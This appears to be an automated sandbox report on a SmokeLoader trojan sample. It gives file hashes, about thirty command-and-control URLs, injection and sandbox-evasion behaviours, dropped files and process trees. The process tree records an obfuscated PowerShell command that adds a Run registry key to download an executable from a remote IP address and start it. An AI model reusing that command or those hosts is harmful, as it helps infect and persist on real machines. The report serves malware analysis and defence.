Analysis
- max time kernel: 147s
- max time network: 183s
- platform: windows7_x64
- resource: win7v20210408
- submitted: 13-08-2021 10:05

Static task: static1

Behavioral task: behavioral1
- Sample: b5de39be28a0649ef87494a658668e13.exe
- Resource: win7v20210408

Behavioral task: behavioral2
- Sample: b5de39be28a0649ef87494a658668e13.exe
- Resource: win10v20210410

General
- Target: b5de39be28a0649ef87494a658668e13.exe
- Size: 180KB
- MD5: b5de39be28a0649ef87494a658668e13
- SHA1: 92e28e70185243da45ee2432241a58b0d4e7fda3
- SHA256: 138d79111af4f878d637e1a8dcf7dbdd46f70527eb68908ad2f977a3554031eb
- SHA512: 2065705100b75f249a6d558342b228442785c0848e027c805e7785de954d7dce93a015e4be9d1ce80a26d5e5bb22d0b4d788ee02dea22413f35a227928608e31
Malware Config
Extracted
- Family: smokeloader
- Version: 2020
- C2 URLs:
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Signatures
- SmokeLoader
  Modular backdoor trojan in use since 2014.
- Downloads MZ/PE file
- Executes dropped EXE (5 IoCs)
  Processes:
    PID 1488  81C.exe
    PID 556   BB5.exe
    PID 1556  E26.exe
    PID 1964  Runtimebroker.exe
    PID 1684  1114.exe
- Deletes itself (1 IoC)
  Processes:
    PID 1256  (no process name recorded)
- Drops startup file (2 IoCs)
  Processes:
    File created:                C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe  (cmd.exe)
    File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe  (cmd.exe)
- Loads dropped DLL (2 IoCs)
  Processes:
    PID 556  BB5.exe  (2 IoCs)
- Suspicious use of SetThreadContext (1 IoC)
  Processes:
    PID 1960 b5de39be28a0649ef87494a658668e13.exe set thread context of PID 1904 b5de39be28a0649ef87494a658668e13.exe
- Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  Processes:
    Key opened:     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  (b5de39be28a0649ef87494a658668e13.exe)
    Key queried:    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  (b5de39be28a0649ef87494a658668e13.exe)
    Key enumerated: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  (b5de39be28a0649ef87494a658668e13.exe)
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes:
    PID 1904  b5de39be28a0649ef87494a658668e13.exe  (2 IoCs)
    PID 1256  (62 IoCs; no process name recorded)
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  Processes:
    PID 1256
- Suspicious behavior: MapViewOfSection (1 IoC)
  Processes:
    PID 1904  b5de39be28a0649ef87494a658668e13.exe
- Suspicious use of FindShellTrayWindow (4 IoCs)
  Processes:
    PID 1256  (4 IoCs)
- Suspicious use of SendNotifyMessage (6 IoCs)
  Processes:
    PID 1256  (6 IoCs)
- Suspicious use of SetWindowsHookEx (1 IoC)
  Processes:
    PID 1488  81C.exe
- Suspicious use of WriteProcessMemory (35 IoCs)
  Processes (source PID/process -> target PID/process, number of writes):
    1960 b5de39be28a0649ef87494a658668e13.exe -> 1904 b5de39be28a0649ef87494a658668e13.exe  (7)
    1256 -> 1488 81C.exe  (4)
    1256 -> 556 BB5.exe  (4)
    1256 -> 1556 E26.exe  (4)
    556 BB5.exe -> 1964 Runtimebroker.exe  (4)
    1256 -> 1684 1114.exe  (4)
    1556 E26.exe -> 1408 cmd.exe  (4)
    1964 Runtimebroker.exe -> 948 powershell.exe  (4)
Processes
- C:\Users\Admin\AppData\Local\Temp\b5de39be28a0649ef87494a658668e13.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\b5de39be28a0649ef87494a658668e13.exe"
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\b5de39be28a0649ef87494a658668e13.exe  (child)
    Command line: "C:\Users\Admin\AppData\Local\Temp\b5de39be28a0649ef87494a658668e13.exe"
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
- C:\Users\Admin\AppData\Local\Temp\81C.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\81C.exe
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
- C:\Users\Admin\AppData\Local\Temp\BB5.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\BB5.exe
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  - C:\ProgramData\Runtimebroker.exe  (child)
    Command line: "C:\ProgramData\Runtimebroker.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (child)
      Command line: powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
- C:\Users\Admin\AppData\Local\Temp\E26.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\E26.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe  (child)
    Command line: cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
    - Drops startup file
- C:\Users\Admin\AppData\Local\Temp\1114.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\1114.exe
  - Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\ProgramData\Runtimebroker.exe
  MD5:    4710cad4ef7196e4cddb126e70e58094
  SHA1:   acce1f47d643fc630cddece0dfd5df493b963c91
  SHA256: 87d77f198d287a93f890bd8eaa311d5190655aa2d4023c5a957fc9653389b04e
  SHA512: 2a2b70ba42923c34691fc96d0323181d1004979c64ab792f834f6fe18a785f3a6476f969c780ebc8d2d81f1cbfd3f335bc0a4a7e3e74fa248afbb64f97655d57
- C:\Users\Admin\AppData\Local\Temp\1114.exe
  MD5:    5707ddada5b7ea6bef434cd294fa12e1
  SHA1:   45bb285a597b30e100ed4b15d96a29d718697e5e
  SHA256: 85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
  SHA512: 91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
- C:\Users\Admin\AppData\Local\Temp\81C.exe
  MD5:    a69e12607d01237460808fa1709e5e86
  SHA1:   4a12f82aee1c90e70cdf6be863ce1a749c8ae411
  SHA256: 188e05efb42c1f7fdb5c910a6614f710a87ae642b23ac9ffe3f75246744865bc
  SHA512: 7533e6da6bac0405fc8b608da8020b54b6ee02592e6fd40ea342e130a8a876ae5ef4a1fd636d95e76339dbf8be45cecbd22ca2d0a4635b055ffafec3d7e15284
- C:\Users\Admin\AppData\Local\Temp\BB5.exe
  MD5:    4710cad4ef7196e4cddb126e70e58094
  SHA1:   acce1f47d643fc630cddece0dfd5df493b963c91
  SHA256: 87d77f198d287a93f890bd8eaa311d5190655aa2d4023c5a957fc9653389b04e
  SHA512: 2a2b70ba42923c34691fc96d0323181d1004979c64ab792f834f6fe18a785f3a6476f969c780ebc8d2d81f1cbfd3f335bc0a4a7e3e74fa248afbb64f97655d57
- C:\Users\Admin\AppData\Local\Temp\E26.exe
  MD5:    b19ac380411ed5d8b5a7e7e0c1da61a6
  SHA1:   9665c20336a5ce437bbf7b564370bfa43e99954c
  SHA256: aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619
  SHA512: 73b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208
- C:\Users\Admin\AppData\Local\Temp\s.bat
  MD5:    40799ea8514dd78785ec9eb185e297f7
  SHA1:   4c489c83d8ec8396f385a7ab07293107b2f1a656
  SHA256: 54be6384a6e25bf168757a3411da0e45dba7b4f930f92590c13dfaa6e50d3dc8
  SHA512: c54a2108eece73f9c6d4cf8f2eb0bbdfde82d66cf2ff6bd1f348b1223134b10184a20822fad2f09a5f8281a6b3048de8afcf87a2f293d49c60e3abc4d7063cde
- \ProgramData\Runtimebroker.exe
  MD5:    4710cad4ef7196e4cddb126e70e58094
  SHA1:   acce1f47d643fc630cddece0dfd5df493b963c91
  SHA256: 87d77f198d287a93f890bd8eaa311d5190655aa2d4023c5a957fc9653389b04e
  SHA512: 2a2b70ba42923c34691fc96d0323181d1004979c64ab792f834f6fe18a785f3a6476f969c780ebc8d2d81f1cbfd3f335bc0a4a7e3e74fa248afbb64f97655d57
- memory/556-72-0x0000000002E10000-0x0000000002E4B000-memory.dmp  Filesize: 236KB
- memory/556-69-0x0000000000000000-mapping.dmp
- memory/556-81-0x0000000000400000-0x0000000002C7C000-memory.dmp  Filesize: 40.5MB
- memory/948-100-0x0000000000400000-0x0000000000401000-memory.dmp  Filesize: 4KB
- memory/948-101-0x00000000049B0000-0x00000000049B1000-memory.dmp  Filesize: 4KB
- memory/948-102-0x0000000004970000-0x0000000004971000-memory.dmp  Filesize: 4KB
- memory/948-103-0x0000000004972000-0x0000000004973000-memory.dmp  Filesize: 4KB
- memory/948-96-0x0000000000000000-mapping.dmp
- memory/1256-64-0x0000000002A20000-0x0000000002A36000-memory.dmp  Filesize: 88KB
- memory/1408-94-0x0000000000000000-mapping.dmp
- memory/1488-65-0x0000000000000000-mapping.dmp
- memory/1556-92-0x0000000000400000-0x0000000002D86000-memory.dmp  Filesize: 41.5MB
- memory/1556-88-0x00000000033B0000-0x00000000035F3000-memory.dmp  Filesize: 2.3MB
- memory/1556-74-0x0000000000000000-mapping.dmp
- memory/1556-91-0x0000000004DB0000-0x0000000004FC1000-memory.dmp  Filesize: 2.1MB
- memory/1556-89-0x0000000000400000-0x0000000002D86000-memory.dmp  Filesize: 41.5MB
- memory/1684-83-0x0000000000000000-mapping.dmp
- memory/1684-86-0x0000000001000000-0x0000000001001000-memory.dmp  Filesize: 4KB
- memory/1684-90-0x0000000004CF0000-0x0000000004CF1000-memory.dmp  Filesize: 4KB
- memory/1904-60-0x0000000000400000-0x0000000000409000-memory.dmp  Filesize: 36KB
- memory/1904-62-0x0000000075201000-0x0000000075203000-memory.dmp  Filesize: 8KB
- memory/1904-61-0x0000000000402E1A-mapping.dmp
- memory/1960-63-0x0000000000220000-0x000000000022A000-memory.dmp  Filesize: 40KB
- memory/1964-82-0x0000000000400000-0x0000000002C7C000-memory.dmp  Filesize: 40.5MB
- memory/1964-78-0x0000000000000000-mapping.dmp